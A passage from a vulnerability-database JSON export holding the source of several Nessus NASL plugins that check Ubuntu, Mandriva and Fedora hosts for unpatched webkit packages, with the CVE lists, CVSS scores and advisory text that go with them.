\"CVE-2010-1407\", \"CVE-2010-1408\", \"CVE-2010-1409\", \"CVE-2010-1410\", \"CVE-2010-1412\", \"CVE-2010-1414\", \"CVE-2010-1415\", \"CVE-2010-1416\", \"CVE-2010-1417\", \"CVE-2010-1418\", \"CVE-2010-1419\", \"CVE-2010-1421\", \"CVE-2010-1422\", \"CVE-2010-1664\", \"CVE-2010-1665\", \"CVE-2010-1758\", \"CVE-2010-1759\", \"CVE-2010-1760\", \"CVE-2010-1761\", \"CVE-2010-1762\", \"CVE-2010-1764\", \"CVE-2010-1766\", \"CVE-2010-1767\", \"CVE-2010-1770\", \"CVE-2010-1771\", \"CVE-2010-1772\", \"CVE-2010-1773\", \"CVE-2010-1774\", \"CVE-2010-1780\", \"CVE-2010-1781\", \"CVE-2010-1782\", \"CVE-2010-1783\", \"CVE-2010-1784\", \"CVE-2010-1785\", \"CVE-2010-1786\", \"CVE-2010-1787\", \"CVE-2010-1788\", \"CVE-2010-1790\", \"CVE-2010-1792\", \"CVE-2010-1793\", \"CVE-2010-1807\", \"CVE-2010-1812\", \"CVE-2010-1814\", \"CVE-2010-1815\", \"CVE-2010-2264\", \"CVE-2010-2647\", \"CVE-2010-2648\", \"CVE-2010-3113\", \"CVE-2010-3114\", \"CVE-2010-3115\", \"CVE-2010-3116\", \"CVE-2010-3248\", \"CVE-2010-3257\", \"CVE-2010-3259\");\n script_bugtraq_id(36339, 36996, 37925, 37948, 38177, 38372, 38373, 38684, 38685, 38686, 38687, 38688, 38689, 38690, 38691, 38692, 39804, 39808, 40644, 40646, 40647, 40649, 40650, 40653, 40654, 40655, 40656, 40657, 40658, 40659, 40660, 40661, 40662, 40663, 40665, 40666, 40667, 40668, 40669, 40670, 40671, 40672, 40675, 40697, 40698, 40705, 40707, 40710, 40714, 40726, 40727, 40732, 40750, 40753, 40754, 40756, 41051, 41053, 41572, 41573, 41575, 42034, 42035, 42036, 42037, 42038, 42041, 42042, 42043, 42044, 42046, 42049, 42494, 42500, 43047, 43077, 43079, 43081, 43083, 44199, 44200, 44201, 44203, 44204, 44206);\n script_xref(name:\"USN\", value:\"1006-1\");\n\n script_name(english:\"Ubuntu 9.10 / 10.04 LTS / 10.10 : webkit vulnerabilities (USN-1006-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A large number of security issues were discovered in the WebKit\nbrowser and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nPlease consult the bug listed at the top of this advisory to get the\nexact list of CVE numbers fixed for each release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1006-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gir1.0-webkit-1.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit-1.0-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit-1.0-2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit-1.0-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:webkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/09/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2019 Canonical, Inc. / NASL script (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(9\\.10|10\\.04|10\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 9.10 / 10.04 / 10.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libwebkit-1.0-2\", pkgver:\"1.2.5-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libwebkit-1.0-2-dbg\", pkgver:\"1.2.5-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libwebkit-1.0-common\", pkgver:\"1.2.5-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libwebkit-dev\", pkgver:\"1.2.5-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"gir1.0-webkit-1.0\", pkgver:\"1.2.5-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libwebkit-1.0-2\", pkgver:\"1.2.5-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libwebkit-1.0-2-dbg\", pkgver:\"1.2.5-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libwebkit-1.0-common\", pkgver:\"1.2.5-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libwebkit-dev\", pkgver:\"1.2.5-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"webkit\", pkgver:\"1.2.5-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"gir1.0-webkit-1.0\", pkgver:\"1.2.5-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libwebkit-1.0-2\", pkgver:\"1.2.5-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libwebkit-1.0-2-dbg\", pkgver:\"1.2.5-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libwebkit-1.0-common\", pkgver:\"1.2.5-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libwebkit-dev\", pkgver:\"1.2.5-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"webkit\", pkgver:\"1.2.5-0ubuntu0.10.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gir1.0-webkit-1.0 / libwebkit-1.0-2 / libwebkit-1.0-2-dbg / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:53:06", "description": "Multiple cross-site scripting, denial of service and arbitrary code\nexecution security flaws were discovered in webkit.\n\nPlease consult the CVE web links for further information.\n\nThe updated packages have been upgraded to the latest version (1.2.7)\nto correct these issues.", "edition": 26, "published": "2011-03-03T00:00:00", "title": "Mandriva Linux Security Advisory : webkit (MDVSA-2011:039)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0049", "CVE-2010-0052", "CVE-2010-1412", "CVE-2010-4197", "CVE-2010-1397", "CVE-2010-4204", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-3257", "CVE-2010-1409", "CVE-2010-0046", "CVE-2010-0651", "CVE-2010-1760", "CVE-2010-0054", "CVE-2010-1783", "CVE-2009-2841", "CVE-2010-3812", "CVE-2010-1758", "CVE-2010-1787", "CVE-2010-1771", "CVE-2009-2797", "CVE-2010-1410", "CVE-2010-1807", "CVE-2010-3116", "CVE-2010-0048", "CVE-2010-3113", "CVE-2010-1415", "CVE-2010-1419", "CVE-2010-1407", "CVE-2010-1780", "CVE-2010-1766", "CVE-2010-1772", "CVE-2010-1389", "CVE-2010-1391", "CVE-2010-1664", "CVE-2010-1387", "CVE-2010-1759", "CVE-2010-2647", "CVE-2010-0650", "CVE-2010-1786", "CVE-2010-1773", "CVE-2010-1785", "CVE-2010-2648", "CVE-2010-3114", "CVE-2010-3119", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2010-2264", "CVE-2010-0314", "CVE-2010-1406", "CVE-2010-1418", "CVE-2010-1398", "CVE-2010-3255", "CVE-2010-1790", "CVE-2010-1401", "CVE-2010-1788", "CVE-2010-1781", "CVE-2010-1815", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1782", "CVE-2010-1814", "CVE-2010-1665", "CVE-2010-3115", "CVE-2010-1792", "CVE-2010-1422", "CVE-2010-1390", "CVE-2010-1767", "CVE-2010-3259", "CVE-2010-4206", "CVE-2010-0656", "CVE-2010-1812", "CVE-2010-1393", "CVE-2010-1791", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-0647", "CVE-2010-4198", "CVE-2010-1784", "CVE-2010-0053", "CVE-2010-0047", "CVE-2010-0051", "CVE-2010-1402", "CVE-2010-3248", "CVE-2010-4040", "CVE-2010-1762", "CVE-2010-0050", "CVE-2010-1386", "CVE-2010-3813", "CVE-2010-1764", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-1421", "CVE-2010-1394", "CVE-2010-1793"], "modified": "2011-03-03T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:webkit", "p-cpe:/a:mandriva:linux:lib64webkitgtk1.0-devel", "p-cpe:/a:mandriva:linux:libwebkitgtk1.0-devel", "p-cpe:/a:mandriva:linux:webkit1.0", "p-cpe:/a:mandriva:linux:webkit-jsc", "p-cpe:/a:mandriva:linux:webkit-gtklauncher", "cpe:/o:mandriva:linux:2010.1", "p-cpe:/a:mandriva:linux:webkit1.0-webinspector", "p-cpe:/a:mandriva:linux:libwebkitgtk1.0_2", "p-cpe:/a:mandriva:linux:lib64webkitgtk1.0_2"], "id": "MANDRIVA_MDVSA-2011-039.NASL", "href": "https://www.tenable.com/plugins/nessus/52523", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:039. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(52523);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2009-2797\",\n \"CVE-2009-2841\",\n \"CVE-2010-0046\",\n \"CVE-2010-0047\",\n \"CVE-2010-0048\",\n \"CVE-2010-0049\",\n \"CVE-2010-0050\",\n \"CVE-2010-0051\",\n \"CVE-2010-0052\",\n \"CVE-2010-0053\",\n \"CVE-2010-0054\",\n \"CVE-2010-0314\",\n \"CVE-2010-0647\",\n \"CVE-2010-0650\",\n \"CVE-2010-0651\",\n \"CVE-2010-0656\",\n \"CVE-2010-1386\",\n \"CVE-2010-1387\",\n \"CVE-2010-1389\",\n \"CVE-2010-1390\",\n \"CVE-2010-1391\",\n \"CVE-2010-1392\",\n \"CVE-2010-1393\",\n \"CVE-2010-1394\",\n \"CVE-2010-1395\",\n \"CVE-2010-1396\",\n \"CVE-2010-1397\",\n \"CVE-2010-1398\",\n \"CVE-2010-1400\",\n \"CVE-2010-1401\",\n \"CVE-2010-1402\",\n \"CVE-2010-1403\",\n \"CVE-2010-1404\",\n \"CVE-2010-1405\",\n \"CVE-2010-1406\",\n \"CVE-2010-1407\",\n \"CVE-2010-1408\",\n \"CVE-2010-1409\",\n \"CVE-2010-1410\",\n \"CVE-2010-1412\",\n \"CVE-2010-1414\",\n \"CVE-2010-1415\",\n \"CVE-2010-1416\",\n \"CVE-2010-1417\",\n \"CVE-2010-1418\",\n \"CVE-2010-1419\",\n \"CVE-2010-1421\",\n \"CVE-2010-1422\",\n \"CVE-2010-1664\",\n \"CVE-2010-1665\",\n \"CVE-2010-1758\",\n \"CVE-2010-1759\",\n \"CVE-2010-1760\",\n \"CVE-2010-1761\",\n \"CVE-2010-1762\",\n \"CVE-2010-1764\",\n \"CVE-2010-1766\",\n \"CVE-2010-1767\",\n \"CVE-2010-1770\",\n \"CVE-2010-1771\",\n \"CVE-2010-1772\",\n \"CVE-2010-1773\",\n \"CVE-2010-1774\",\n \"CVE-2010-1780\",\n \"CVE-2010-1781\",\n \"CVE-2010-1782\",\n \"CVE-2010-1783\",\n \"CVE-2010-1784\",\n \"CVE-2010-1785\",\n \"CVE-2010-1786\",\n \"CVE-2010-1787\",\n \"CVE-2010-1788\",\n \"CVE-2010-1790\",\n \"CVE-2010-1791\",\n \"CVE-2010-1792\",\n \"CVE-2010-1793\",\n \"CVE-2010-1807\",\n \"CVE-2010-1812\",\n \"CVE-2010-1814\",\n \"CVE-2010-1815\",\n \"CVE-2010-2264\",\n \"CVE-2010-2647\",\n \"CVE-2010-2648\",\n \"CVE-2010-3113\",\n \"CVE-2010-3114\",\n \"CVE-2010-3115\",\n \"CVE-2010-3116\",\n \"CVE-2010-3119\",\n \"CVE-2010-3248\",\n \"CVE-2010-3255\",\n \"CVE-2010-3257\",\n \"CVE-2010-3259\",\n \"CVE-2010-3812\",\n \"CVE-2010-3813\",\n \"CVE-2010-4040\",\n \"CVE-2010-4197\",\n \"CVE-2010-4198\",\n \"CVE-2010-4204\",\n \"CVE-2010-4206\"\n );\n script_bugtraq_id(\n 36339,\n 36996,\n 37925,\n 38372,\n 38373,\n 38684,\n 38685,\n 38686,\n 38687,\n 38688,\n 38689,\n 38690,\n 38691,\n 38692,\n 39804,\n 39808,\n 40644,\n 40646,\n 40647,\n 40649,\n 40650,\n 40653,\n 40654,\n 40655,\n 40656,\n 40657,\n 40658,\n 40659,\n 40660,\n 40661,\n 40662,\n 40663,\n 40665,\n 40666,\n 40667,\n 40668,\n 40669,\n 40670,\n 40671,\n 40672,\n 40675,\n 40697,\n 40698,\n 40705,\n 40707,\n 40710,\n 40714,\n 40726,\n 40727,\n 40732,\n 40750,\n 40753,\n 40754,\n 40756,\n 41051,\n 41053,\n 41572,\n 41573,\n 41575,\n 42034,\n 42035,\n 42036,\n 42037,\n 42038,\n 42041,\n 42042,\n 42043,\n 42044,\n 42045,\n 42046,\n 42049,\n 42494,\n 42500,\n 43047,\n 43077,\n 43079,\n 43081,\n 43083,\n 44199,\n 44200,\n 44201,\n 44203,\n 44204,\n 44206,\n 44215,\n 44216,\n 44217,\n 44954,\n 44960,\n 45718,\n 45719,\n 45720,\n 45721\n );\n script_xref(name:\"MDVSA\", value:\"2011:039\");\n\n script_name(english:\"Mandriva Linux Security Advisory : webkit (MDVSA-2011:039)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple cross-site scripting, denial of service and arbitrary code\nexecution security flaws were discovered in webkit.\n\nPlease consult the CVE web links for further information.\n\nThe updated packages have been upgraded to the latest version (1.2.7)\nto correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64webkitgtk1.0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64webkitgtk1.0_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libwebkitgtk1.0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libwebkitgtk1.0_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:webkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:webkit-gtklauncher\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:webkit-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:webkit1.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:webkit1.0-webinspector\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/03/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64webkitgtk1.0-devel-1.2.7-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64webkitgtk1.0_2-1.2.7-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libwebkitgtk1.0-devel-1.2.7-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libwebkitgtk1.0_2-1.2.7-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"webkit-1.2.7-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"webkit-gtklauncher-1.2.7-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"webkit-jsc-1.2.7-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"webkit1.0-1.2.7-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"webkit1.0-webinspector-1.2.7-0.1mdv2010.2\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:07:59", "description": "Update to 1.2.4 which fixes: CVE-2010-1780 CVE-2010-1782 CVE-2010-1784\nCVE-2010-1785 CVE-2010-1786 CVE-2010-1787 CVE-2010-1788 CVE-2010-1790\nCVE-2010-1792 CVE-2010-1793 CVE-2010-2648\n\nUpdate to 1.2.3 which fixes: CVE-2010-1386 CVE-2010-1392 CVE-2010-1405\nCVE-2010-1407 CVE-2010-1416 CVE-2010-1417 CVE-2010-1665 CVE-2010-1418\nCVE-2010-1421 CVE-2010-1422 CVE-2010-1501 CVE-2010-1767 CVE-2010-1664\nCVE-2010-1758 CVE-2010-1759 CVE-2010-1760 CVE-2010-1761 CVE-2010-1762\nCVE-2010-1770 CVE-2010-1771 CVE-2010-1772 CVE-2010-1773 CVE-2010-1774\nCVE-2010-2264\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2010-09-21T00:00:00", "title": "Fedora 12 : webkitgtk-1.2.4-1.fc12 (2010-14419)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1760", "CVE-2010-1783", "CVE-2010-1758", "CVE-2010-1787", "CVE-2010-1771", "CVE-2010-1407", "CVE-2010-1780", "CVE-2010-1772", "CVE-2010-1664", "CVE-2010-1759", "CVE-2010-1786", "CVE-2010-1773", "CVE-2010-1785", "CVE-2010-1501", "CVE-2010-2648", "CVE-2010-1774", "CVE-2010-2264", "CVE-2010-1418", "CVE-2010-1790", "CVE-2010-1788", "CVE-2010-1761", "CVE-2010-1782", "CVE-2010-1665", "CVE-2010-1792", "CVE-2010-1422", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1784", "CVE-2010-1762", "CVE-2010-1386", "CVE-2010-1405", "CVE-2010-1421", "CVE-2010-1793"], "modified": "2010-09-21T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:12", "p-cpe:/a:fedoraproject:fedora:webkitgtk"], "id": "FEDORA_2010-14419.NASL", "href": "https://www.tenable.com/plugins/nessus/49295", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-14419.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49295);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-1772\", \"CVE-2010-1773\", \"CVE-2010-1780\", \"CVE-2010-1782\", \"CVE-2010-1783\", \"CVE-2010-1784\", \"CVE-2010-1785\", \"CVE-2010-1786\", \"CVE-2010-1787\", \"CVE-2010-1788\", \"CVE-2010-1790\", \"CVE-2010-1792\", \"CVE-2010-1793\");\n script_bugtraq_id(41573, 41575, 42034, 42035, 42036, 42037, 42038, 42041, 42042, 42043, 42044, 42046, 42049);\n script_xref(name:\"FEDORA\", value:\"2010-14419\");\n\n script_name(english:\"Fedora 12 : webkitgtk-1.2.4-1.fc12 (2010-14419)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 1.2.4 which fixes: CVE-2010-1780 CVE-2010-1782 CVE-2010-1784\nCVE-2010-1785 CVE-2010-1786 CVE-2010-1787 CVE-2010-1788 CVE-2010-1790\nCVE-2010-1792 CVE-2010-1793 CVE-2010-2648\n\nUpdate to 1.2.3 which fixes: CVE-2010-1386 CVE-2010-1392 CVE-2010-1405\nCVE-2010-1407 CVE-2010-1416 CVE-2010-1417 CVE-2010-1665 CVE-2010-1418\nCVE-2010-1421 CVE-2010-1422 CVE-2010-1501 CVE-2010-1767 CVE-2010-1664\nCVE-2010-1758 CVE-2010-1759 CVE-2010-1760 CVE-2010-1761 CVE-2010-1762\nCVE-2010-1770 CVE-2010-1771 CVE-2010-1772 CVE-2010-1773 CVE-2010-1774\nCVE-2010-2264\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=606303\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=606304\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=615728\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=615729\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=631583\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-September/047984.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?573b4c4f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/09/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = 